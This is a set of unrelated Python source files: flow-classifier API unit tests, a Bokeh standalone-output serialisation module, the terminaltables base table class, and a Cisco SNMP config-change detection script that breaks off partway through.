_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_port_id_nouuid(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': 'unknown',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_list(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = [{
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}]
instance = self.plugin.return_value
instance.get_flow_classifiers.return_value = return_value
res = self.api.get(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt))
instance.get_flow_classifiers.assert_called_with(
mock.ANY,
fields=mock.ANY,
filters=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifiers', res)
self.assertEqual(return_value, res['flow_classifiers'])
def test_flow_classifier_list_all_fields(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = [{
'name': 'abc',
'description': 'abc',
'ethertype': 'IPv4',
'protocol': const.PROTO_NAME_TCP,
'source_ip_prefix': '10.0.0.0/8',
'destination_ip_prefix': '10.0.0.0/8',
'source_port_range_min': 100,
'source_port_range_max': 200,
'destination_port_range_min': 100,
'destination_port_range_max': 200,
'logical_source_port': _uuid(),
'logical_destination_port': _uuid(),
'l7_parameters': {},
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}]
instance = self.plugin.return_value
instance.get_flow_classifiers.return_value = return_value
res = self.api.get(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt))
instance.get_flow_classifiers.assert_called_with(
mock.ANY,
fields=mock.ANY,
filters=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifiers', res)
self.assertEqual(return_value, res['flow_classifiers'])
def test_flow_classifier_list_unknown_fields(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = [{
'logical_source_port': _uuid(),
'new_key': 'value',
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}]
expected_return = copy.copy(return_value)
for item in expected_return:
del item['new_key']
instance = self.plugin.return_value
instance.get_flow_classifiers.return_value = return_value
res = self.api.get(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt))
instance.get_flow_classifiers.assert_called_with(
mock.ANY,
fields=mock.ANY,
filters=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifiers', res)
self.assertEqual(expected_return, res['flow_classifiers'])
def test_flow_classifier_get(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}
instance = self.plugin.return_value
instance.get_flow_classifier.return_value = return_value
res = self.api.get(
_get_path(
FLOW_CLASSIFIER_PATH,
id=flowclassifier_id, fmt=self.fmt
)
)
instance.get_flow_classifier.assert_called_with(
mock.ANY,
flowclassifier_id,
fields=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_flow_classifier_update(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
update_data = {'flow_classifier': {
'name': 'new_name',
'description': 'new_desc',
}}
return_value = {
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}
instance = self.plugin.return_value
instance.update_flow_classifier.return_value = return_value
res = self.api.put(
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(update_data))
instance.update_flow_classifier.assert_called_with(
mock.ANY, flowclassifier_id,
flow_classifier=update_data)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_flow_classifier_update_source_port_range_min(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'source_port_range_min': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_source_port_range_max(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'source_port_range_max': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_destination_port_range_min(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'destination_port_range_min': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_destination_port_range_max(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'destination_port_range_max': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_source_ip_prefix(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': '10.0.0.0/8',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_destination_ip_prefix(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'destination_ip_prefix': '10.0.0.0/8',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_logical_source_port(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_logical_destination_port(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'logical_destination_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_ethertype(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'ethertype': None,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_protocol(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'protococol': None,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_l7_parameters(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'l7_parameters': {},
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_delete(self):
self._test_entity_delete('flow_classifier')
|
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager
# Bokeh imports
from ..document.document import Document
from ..model import Model, collect_models
from ..settings import settings
from ..util.serialization import make_globally_unique_id
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'FromCurdoc',
'OutputDocumentFor',
'RenderItem',
'RenderRoot',
'RenderRoots',
'standalone_docs_json',
'standalone_docs_json_and_render_items',
'submodel_has_python_callbacks',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
class FromCurdoc(object):
''' This class merely provides a non-None default value for ``theme``
arguments, since ``None`` itself is a meaningful value for users to pass.
'''
pass
@contextmanager
def OutputDocumentFor(objs, apply_theme=None, always_new=False):
''' Find or create a (possibly temporary) Document to use for serializing
Bokeh content.
Typical usage is similar to:
.. code-block:: python
with OutputDocumentFor(models):
(docs_json, [render_item]) = standalone_docs_json_and_render_items(models)
Inside the context manager, the models will be considered to be part of a single
Document, with any theme specified, which can thus be serialized as a unit. Where
possible, OutputDocumentFor attempts to use an existing Document. However, this is
not possible in three cases:
* If passed a series of models that have no Document at all, a new Document will
be created, and all the models will be added as roots. After the context manager
exits, the new Document will continue to be the models' document.
* If passed a subset of Document.roots, then OutputDocumentFor temporarily "re-homes"
the models in a new bare Document that is only available inside the context manager.
* If passed a list of models that have different documents, then OutputDocumentFor
temporarily "re-homes" the models in a new bare Document that is only available
inside the context manager.
OutputDocumentFor will also perfom document validation before yielding, if
``settings.perform_document_validation()`` is True.
objs (seq[Model]) :
a sequence of Models that will be serialized, and need a common document
apply_theme (Theme or FromCurdoc or None, optional):
Sets the theme for the doc while inside this context manager. (default: None)
If None, use whatever theme is on the document that is found or created
If FromCurdoc, use curdoc().theme, restoring any previous theme afterwards
If a Theme instance, use that theme, restoring any previous theme afterwards
always_new (bool, optional) :
Always return a new document, even in cases where it is otherwise possible
to use an existing document on models.
Yields:
Document
'''
# Note: Comms handling relies on the fact that the new_doc returned
# has models with the same IDs as they were started with
if not isinstance(objs, Sequence) or len(objs) == 0 or not all(isinstance(x, Model) for x in objs):
raise ValueError("OutputDocumentFor expects a sequence of Models")
def finish(): pass
docs = set(x.document for x in objs)
if None in docs: docs.remove(None)
if always_new:
def finish(): # NOQA
_dispose_temp_doc(objs)
doc = _create_temp_doc(objs)
else:
if len(docs) == 0:
doc = Document()
for model in objs:
doc.add_root(model)
# handle a single shared document
elif len(docs) == 1:
doc = docs.pop()
# we are not using all the roots, make a quick clone for outputting purposes
if set(objs) != set(doc.roots):
def finish(): # NOQA
_dispose_temp_doc(objs)
doc = _create_temp_doc(objs)
# we are using all the roots of a single doc, just use doc as-is
pass # lgtm [py/unnecessary-pass]
# models have mixed docs, just make a quick clone
else:
def finish(): # NOQA
_dispose_temp_doc(objs)
doc = _create_temp_doc(objs)
if settings.perform_document_validation():
doc.validate()
_set_temp_theme(doc, apply_theme)
yield doc
_unset_temp_theme(doc)
finish()
class RenderItem(object):
def __init__(self, docid=None, token=None, elementid=None, roots=None, use_for_title=None):
if (docid is None and token is None) or (docid is not None and token is not None):
raise ValueError("either docid or sessionid must be provided")
if roots is None:
roots = OrderedDict()
elif isinstance(roots, list):
roots = OrderedDict([ (root, make_globally_unique_id()) for root in roots ])
self.docid = docid
self.token = token
self.elementid = elementid
self.roots = RenderRoots(roots)
self.use_for_title = use_for_title
def to_json(self):
json = {}
if self.docid is not None:
json["docid"] = self.docid
else:
json["token"] = self.token
if self.elementid is not None:
json["elementid"] = self.elementid
if self.roots:
json["roots"] = self.roots.to_json()
json["root_ids"] = [root.id for root in self.roots]
if self.use_for_title is not None:
json["use_for_title"] = self.use_for_title
return json
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
else:
return self.to_json() == other.to_json()
class RenderRoot(object):
def __init__(self, elementid, id, name=None, tags=None):
self.elementid = elementid
self.id = id
self.name = name or ""
self.tags = tags or []
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
else:
return self.elementid == other.elementid
class RenderRoots(object):
def __init__(self, roots):
self._roots = roots
def __len__(self):
return len(self._roots.items())
def __getitem__(self, key):
if isinstance(key, int):
(root, elementid) = list(self._roots.items())[key]
else:
for root, elementid in self._roots.items():
if root.name == key:
break
else:
raise ValueError("root with '%s' name not found" % key)
return RenderRoot(elementid, root.id, root.name, root.tags)
def __getattr__(self, key):
return self.__getitem__(key)
def to_json(self):
return OrderedDict([ (root.id, elementid) for root, elementid in self._roots.items() ])
def standalone_docs_json(models):
'''
'''
docs_json, render_items = standalone_docs_json_and_render_items(models)
return docs_json
def standalone_docs_json_and_render_items(models, suppress_callback_warning=False):
'''
'''
if isinstance(models, (Model, Document)):
models = [models]
if not (isinstance(models, Sequence) and all(isinstance(x, (Model, Document)) for x in models)):
raise ValueError("Expected a Model, Document, or Sequence of Models or Documents")
if submodel_has_python_callbacks(models) and not suppress_callback_warning:
log.warning(_CALLBACKS_WARNING)
docs = {}
for model_or_doc in models:
if isinstance(model_or_doc, Document):
model = None
doc = model_or_doc
else:
model = model_or_doc
doc = model.document
if doc is None:
raise ValueError("A Bokeh Model must be part of a Document to render as standalone content")
if doc not in docs:
docs[doc] = (make_globally_unique_id(), OrderedDict())
(docid, roots) = docs[doc]
if model is not None:
roots[model] = make_globally_unique_id()
else:
for model in doc.roots:
roots[model] = make_globally_unique_id()
docs_json = {}
for doc, (docid, _) in docs.items():
docs_json[docid] = doc.to_json()
render_items = []
for _, (docid, roots) in docs.items():
render_items.append(RenderItem(docid, roots=roots))
return (docs_json, render_items)
def submodel_has_python_callbacks(models):
''' Traverses submodels to check for Python (event) callbacks
'''
has_python_callback = False
for model in collect_models(models):
if len(model._callbacks) > 0 or len(model._event_callbacks) > 0:
has_python_callback = True
break
return has_python_callback
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
_CALLBACKS_WARNING = """
You are generating standalone HTML/JS output, but trying to use real Python
callbacks (i.e. with on_change or on_event). This combination cannot work.
Only JavaScript callbacks may be used with standalone output. For more
information on JavaScript callbacks with Bokeh, see:
https://docs.bokeh.org/en/latest/docs/user_guide/interaction/callbacks.html
Alternatively, to use real Python callbacks, a Bokeh server application may
be used. For more information on building and running Bokeh applications, see:
https://docs.bokeh.org/en/latest/docs/user_guide/server.html
"""
def _create_temp_doc(models):
doc = Document()
for m in models:
doc._all_models[m.id] = m
m._temp_document = doc
for ref in m.references():
doc._all_models[ref.id] = ref
ref._temp_document = doc
doc._roots = models
return doc
def _dispose_temp_doc(models):
for m in models:
m._temp_document = None
for ref in m.references():
ref._temp_document = None
def _set_temp_theme(doc, apply_theme):
doc._old_theme = doc.theme
if apply_theme is FromCurdoc:
from ..io import curdoc; curdoc
doc.theme = curdoc().theme
elif apply_theme is not None:
doc.theme = apply_theme
def _unset_temp_theme(doc):
if not hasattr(doc, "_old_theme"):
return
doc.theme = doc._old_theme
del doc._old_theme
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
|
"""Base table class. Define just the bare minimum to build tables."""
from terminaltables.build import build_border, build_row, flatten
from terminaltables.width_and_alignment import align_and_pad_cell, max_dimensions
class BaseTable(object):
"""Base table class.
:ivar iter table_data: List (empty or list of lists of strings) representing the table.
:ivar str title: Optional title to show within the top border of the table.
:ivar bool inner_column_border: Separates columns.
:ivar bool inner_footing_row_border: Show a border before the last row.
:ivar bool inner_heading_row_border: Show a border after the first row.
:ivar bool inner_row_border: Show a border in between every row.
:ivar bool outer_border: Show the top, left, right, and bottom border.
:ivar dict justify_columns: Horizontal justification. Keys are column indexes (int). Values are right/left/center.
:ivar int padding_left: Number of spaces to pad on the left side of every cell.
:ivar int padding_right: Number of spaces to pad on the right side of every cell.
"""
CHAR_F_INNER_HORIZONTAL = '-'
CHAR_F_INNER_INTERSECT = '+'
CHAR_F_INNER_VERTICAL = '|'
CHAR_F_OUTER_LEFT_INTERSECT = '+'
CHAR_F_OUTER_LEFT_VERTICAL = '|'
CHAR_F_OUTER_RIGHT_INTERSECT = '+'
CHAR_F_OUTER_RIGHT_VERTICAL = '|'
CHAR_H_INNER_HORIZONTAL = '-'
CHAR_H_INNER_INTERSECT = '+'
CHAR_H_INNER_VERTICAL = '|'
CHAR_H_OUTER_LEFT_INTERSECT = '+'
CHAR_H_OUTER_LEFT_VERTICAL = '|'
CHAR_H_OUTER_RIGHT_INTERSECT = '+'
CHAR_H_OUTER_RIGHT_VERTICAL = '|'
CHAR_INNER_HORIZONTAL = '-'
CHAR_INNER_INTERSECT = '+'
CHAR_INNER_VERTICAL = '|'
CHAR_OUTER_BOTTOM_HORIZONTAL = '-'
CHAR_OUTER_BOTTOM_INTERSECT = '+'
CHAR_OUTER_BOTTOM_LEFT = '+'
CHAR_OUTER_BOTTOM_RIGHT = '+'
CHAR_OUTER_LEFT_INTERSECT = '+'
CHAR_OUTER_LEFT_VERTICAL = '|'
CHAR_OUTER_RIGHT_INTERSECT = '+'
CHAR_OUTER_RIGHT_VERTICAL = '|'
CHAR_OUTER_TOP_HORIZONTAL = '-'
CHAR_OUTER_TOP_INTERSECT = '+'
CHAR_OUTER_TOP_LEFT = '+'
CHAR_OUTER_TOP_RIGHT = '+'
def __init__(self, table_data, title=None):
"""Constructor.
:param iter table_data: List (empty or list of lists of strings) representing the table.
:param title: Optional title to show within the top border of the table.
"""
self.table_data = table_data
self.title = title
self.inner_column_border = True
self.inner_footing_row_border = False
self.inner_heading_row_border = True
self.inner_row_border = False
self.outer_border = True
self.justify_columns = dict() # {0: 'right', 1: 'left', 2: 'center'}
self.padding_left = 1
self.padding_right = 1
def horizontal_border(self, style, outer_widths):
"""Build any kind of horizontal border for the table.
:param str style: Type of border to return.
:param iter outer_widths: List of widths (with padding) for each column.
:return: Prepared border as a tuple of strings.
:rtype: tuple
"""
if style == 'top':
horizontal = self.CHAR_OUTER_TOP_HORIZONTAL
left = self.CHAR_OUTER_TOP_LEFT
intersect = self.CHAR_OUTER_TOP_INTERSECT if self.inner_column_border else ''
right = self.CHAR_OUTER_TOP_RIGHT
title = self.title
elif style == 'bottom':
horizontal = self.CHAR_OUTER_BOTTOM_HORIZONTAL
left = self.CHAR_OUTER_BOTTOM_LEFT
intersect = self.CHAR_OUTER_BOTTOM_INTERSECT if self.inner_column_border else ''
right = self.CHAR_OUTER_BOTTOM_RIGHT
title = None
elif style == 'heading':
horizontal = self.CHAR_H_INNER_HORIZONTAL
left = self.CHAR_H_OUTER_LEFT_INTERSECT if self.outer_border else ''
intersect = self.CHAR_H_INNER_INTERSECT if self.inner_column_border else ''
right = self.CHAR_H_OUTER_RIGHT_INTERSECT if self.outer_border else ''
title = None
elif style == 'footing':
horizontal = self.CHAR_F_INNER_HORIZONTAL
left = self.CHAR_F_OUTER_LEFT_INTERSECT if self.outer_border else ''
intersect = self.CHAR_F_INNER_INTERSECT if self.inner_column_border else ''
right = self.CHAR_F_OUTER_RIGHT_INTERSECT if self.outer_border else ''
title = None
else:
horizontal = self.CHAR_INNER_HORIZONTAL
left = self.CHAR_OUTER_LEFT_INTERSECT if self.outer_border else ''
intersect = self.CHAR_INNER_INTERSECT if self.inner_column_border else ''
right = self.CHAR_OUTER_RIGHT_INTERSECT if self.outer_border else ''
title = None
return build_border(outer_widths, horizontal, left, intersect, right, title)
def gen_row_lines(self, row, style, inner_widths, height):
r"""Combine cells in row and group them into lines with vertical borders.
Caller is expected to pass yielded lines to ''.join() to combine them into a printable line. Caller must append
newline character to the end of joined line.
In:
['Row One Column One', 'Two', 'Three']
Out:
[
('|', ' Row One Column One ', '|', ' Two ', '|', ' Three ', '|'),
]
In:
['Row One\nColumn One', 'Two', 'Three'],
Out:
[
('|', ' Row One ', '|', ' Two ', '|', ' Three ', '|'),
('|', ' Column One ', '|', ' ', '|', ' ', '|'),
]
:param iter row: One row in the table. List of cells.
:param str style: Type of border characters to use.
:param iter inner_widths: List of widths (no padding) for each column.
:param int height: Inner height (no padding) (number of lines) to expand row to.
:return: Yields lines split into components in a list. Caller must ''.join() line.
"""
cells_in_row = list()
# Resize row if it doesn't have enough cells.
if len(row) != len(inner_widths):
row = row + [''] * (len(inner_widths) - len(row))
# Pad and align each cell. Split each cell into lines to support multi-line cells.
for i, cell in enumerate(row):
align = (self.justify_columns.get(i),)
inner_dimensions = (inner_widths[i], height)
padding = (self.padding_left, self.padding_right, 0, 0)
cells_in_row.append(align_and_pad_cell(cell, align, inner_dimensions, padding))
# Determine border characters.
if style == 'heading':
left = self.CHAR_H_OUTER_LEFT_VERTICAL if self.outer_border else ''
center = self.CHAR_H_INNER_VERTICAL if self.inner_column_border else ''
right = self.CHAR_H_OUTER_RIGHT_VERTICAL if self.outer_border else ''
elif style == 'footing':
left = self.CHAR_F_OUTER_LEFT_VERTICAL if self.outer_border else ''
center = self.CHAR_F_INNER_VERTICAL if self.inner_column_border else ''
right = self.CHAR_F_OUTER_RIGHT_VERTICAL if self.outer_border else ''
else:
left = self.CHAR_OUTER_LEFT_VERTICAL if self.outer_border else ''
center = self.CHAR_INNER_VERTICAL if self.inner_column_border else ''
right = self.CHAR_OUTER_RIGHT_VERTICAL if self.outer_border else ''
# Yield each line.
for line in build_row(cells_in_row, left, center, right):
yield line
def gen_table(self, inner_widths, inner_heights, outer_widths):
"""Combine everything and yield every line of the entire table with borders.
:param iter inner_widths: List of widths (no padding) for each column.
:param iter inner_heights: List of heights (no padding) for each row.
:param iter outer_widths: List of widths (with padding) for each column.
:return:
"""
# Yield top border.
if self.outer_border:
yield self.horizontal_border('top', outer_widths)
# Yield table body.
row_count = len(self.table_data)
last_row_index, before_last_row_index = row_count - 1, row_count - 2
for i, row in enumerate(self.table_data):
# Yield the row line by line (e.g. multi-line rows).
if self.inner_heading_row_border and i == 0:
style = 'heading'
elif self.inner_footing_row_border and i == last_row_index:
style = 'footing'
else:
style = 'row'
for line in self.gen_row_lines(row, style, inner_widths, inner_heights[i]):
yield line
# If this is the last row then break. No separator needed.
if i == last_row_index:
break
# Yield heading separator.
if self.inner_heading_row_border and i == 0:
yield self.horizontal_border('heading', outer_widths)
# Yield footing separator.
elif self.inner_footing_row_border and i == before_last_row_index:
yield self.horizontal_border('footing', outer_widths)
# Yield row separator.
elif self.inner_row_border:
yield self.horizontal_border('row', outer_widths)
# Yield bottom border.
if self.outer_border:
yield self.horizontal_border('bottom', outer_widths)
@property
def table(self):
"""Return a large string of the entire table ready to be printed to the terminal."""
dimensions = max_dimensions(self.table_data, self.padding_left, self.padding_right)[:3]
return flatten(self.gen_table(*dimensions))
|
|
#!/usr/bin/env python
from common import config
from common.entities import entities
from common import oids
from common.prettytable import PrettyTable
from common.util import cisco_tics_to_ctime
from common.util import send_email
from common.util import get_snmp_data
from common.util import myDict
from common.util import read_data_file
from common.util import write_data_file
import os
import time
def my_oids():
oids_dict = {
'running_last_changed': oids.get('ccmHistoryRunningLastChanged'),
'running_last_saved': oids.get('ccmHistoryRunningLastSaved'),
'startup_last_changed': oids.get('ccmHistoryStartupLastChanged'),
'uptime': oids.get('sysUptime'),
}
return myDict(oids_dict)
def my_data_files():
data_folder = config.cfg.data_file_folder
data_files = ['last_changed.p', 'last_changed.json', 'last_changed.yml']
full_file_paths = []
for data_file in data_files:
file_name = '/'.join([data_folder, data_file])
full_file_paths.append(file_name)
return full_file_paths
def is_equal_dicts(data_dict):
d_list = []
for data in data_dict.itervalues():
d_list.append(data)
if d_list.count(d_list[0]) == len(d_list):
return True
else:
return False
def my_get_snmp_data(device_tuple, user_tuple, oids_dict):
snmp_data_dict = myDict()
snmp_data_dict['epoch'] = str(time.time())
for oid_alias, oid_string in oids_dict.items():
snmp_data_dict[oid_alias] = get_snmp_data(
tuple(device_tuple),
tuple(user_tuple),
oid_string
)
return dict(snmp_data_dict)
def get_file_data(file_name):
file_data_dict = read_data_file(file_name)
return file_data_dict
def write_data(file_name, data):
write_data_file(file_name, data)
def setup():
setup_args = myDict()
setup_args.devices = entities.devices
setup_args.user_tuple = entities.users.user1
setup_args.oids_dict = my_oids()
setup_args.data_files = my_data_files()
setup_args.file_data_dict = myDict()
return setup_args
def get_device_data(data_files):
# Load saved device data if any, from all indicated data files.
# There are multiple data files just to illustrate the use of
# various data formats (JSON, YAML, PICKLE).
# Make sure the data structure is the same in each data file.
saved_data = myDict()
saved_devices = myDict()
for file_name in data_files:
saved_data[file_name] = get_file_data(file_name)
if is_equal_dicts(saved_data):
if saved_data[file_name] is not None:
saved_devices = saved_data[file_name]
else:
print (
"ERROR: Data in data files differs! Deleting data files.",
data_files
)
for file_name in data_files:
if os.path.exists(file_name):
os.remove(file_name)
raise BaseException
return saved_data, saved_devices
def get_device_snmp_data(devices, user_tuple, oids_dict):
# get snmp data from each device for each oid
snmp_data = myDict()
for dev_name, device_tuple in devices.iteritems():
snmp_data[dev_name] = my_get_snmp_data(
device_tuple,
user_tuple,
oids_dict
)
return snmp_data
def compare_snmp_saved(snmp_data, saved_devices):
# compare SNMP data with saved data
devices_dict = {}
for dev_name in list([x for x in snmp_data if x in saved_devices]):
saved = saved_devices[dev_name]
snmp = snmp_data[dev_name]
# logic to detect running config changes and reloads
change_detected = False
reload_detected = False
status_msg = ""
if (
snmp['uptime'] < saved['uptime'] or
snmp['running_last_changed'] < saved['running_last_changed']
):
reload_detected = True
if (
snmp['running_last_changed'] <=
config.cfg.reload_max_last_changed
):
status_msg = (
dev_name, "was RELOADED, running config NOT CHANGED."
)
change_detected = False
else:
status_msg = dev_name, "was RELOADED, running config CHANGED."
change_detected = True
elif snmp['running_last_changed'] == saved['running_last_changed']:
status_msg = dev_name, "running config NOT CHANGED."
change_detected = False
elif snmp['running_last_changed'] > saved['running_last_changed']:
status_msg = dev_name, "running config CHANGED."
change_detected = True
else:
print "ERROR: What?!?!"
raise ValueError()
# device info for report and notifications
devices_dict.update(
{
dev_name: {
'Status Message': status_msg,
'Change Detected': change_detected,
'Reload Detected': reload_detected,
'old': cisco_tics_to_ctime(
saved['epoch'],
saved['uptime'],
saved['running_last_changed'],
saved['running_last_saved'],
saved['startup_last_changed']
),
'new': cisco_tics_to_ctime(
snmp['epoch'],
snmp['uptime'],
snmp['running_last_changed'],
snmp['running_last_saved'],
snmp['startup_last_changed']
),
},
},
)
return devices_dict
def save_device_data(data_files, snmp_data):
# save all device data to file(s)
for file_name in data_files:
write_data(file_name, snmp_data)
def setup_tables(devices_dict):
# report on detected device info
report_name = "Cisco Device Configuration Change Detection Report"
report_time = time.ctime(time.time())
tables = {}
data_rows = {}
tables['header_table'] = PrettyTable(
[
'Report Name',
'Time of Report'
]
)
tables['header_table'].add_row([report_name, report_time])
tables['summary_table'] = PrettyTable(
[
'Total Device Count',
'Total Changed Device Count',
'Total Reloaded Device Count',
'Total Unchanged Device Count',
]
)
data_table_cols = [
'Device Name',
'Attribute',
'Current Value',
'Previous Value',
]
states = ['changed', 'unchanged']
for state in states:
tables[state] = PrettyTable(data_table_cols)
tables[state].align = 'r'
data_rows[state] = []
time_cols = [
'Scan Time',
'Up Time',
'Boot Time',
'Startup Config Changed Time',
'Running Config Saved Time',
'Running Config Changed Time'
]
tables_dict = {
'tables': tables,
'data_rows': data_rows,
'data_table_cols': data_table_cols,
'states': states,
'time_cols': time_cols,
}
return tables_dict
def compile_tables_data(devices_dict, tables_dict):
device_count = len(devices_dict)
reload_count = 0
change_count = 0
unchange_count = 0
yes = 'YES'
no = 'NO'
na = 'N/A (not saved)'
for dev_name in devices_dict.iterkeys():
dev = devices_dict[dev_name]
dev_old = dev['old']
dev_new = dev['new']
if dev['Reload Detected'] and dev['Change Detected']:
reload_count += 1
change_count += 1
cd = rd = yes
state = 'changed'
elif dev['Reload Detected']:
reload_count += 1
cd = no
rd = yes
state = 'unchanged'
elif dev['Change Detected']:
change_count += 1
cd = yes
rd = no
state = 'changed'
else:
cd = no
rd = no
state = 'unchanged'
tables_dict['data_rows'][state].extend(
[
[
dev_name,
'Change Detected',
cd,
na
],
[
dev_name,
'Reload Detected',
rd,
na
],
[
dev_name,
'Status Message',
dev['Status Message'],
na
],
]
)
for time_col in tables_dict['time_cols']:
tables_dict['data_rows'][state].append(
[
dev_name,
time_col,
dev_new[time_col],
dev_old[time_col]
],
)
unchange_count = device_count - change_count
tables_dict['tables']['summary_table'].add_row(
[
device_count,
change_count,
reload_count,
unchange_count,
]
)
for state in tables_dict['states']:
for data_row in tables_dict['data_rows'][state]:
tables_dict['tables'][state].add_row(data_row)
counts_dict = {
'change_count': change_count,
'unchange_count': unchange_count,
'device_count': device_count,
'reload_count': reload_count,
}
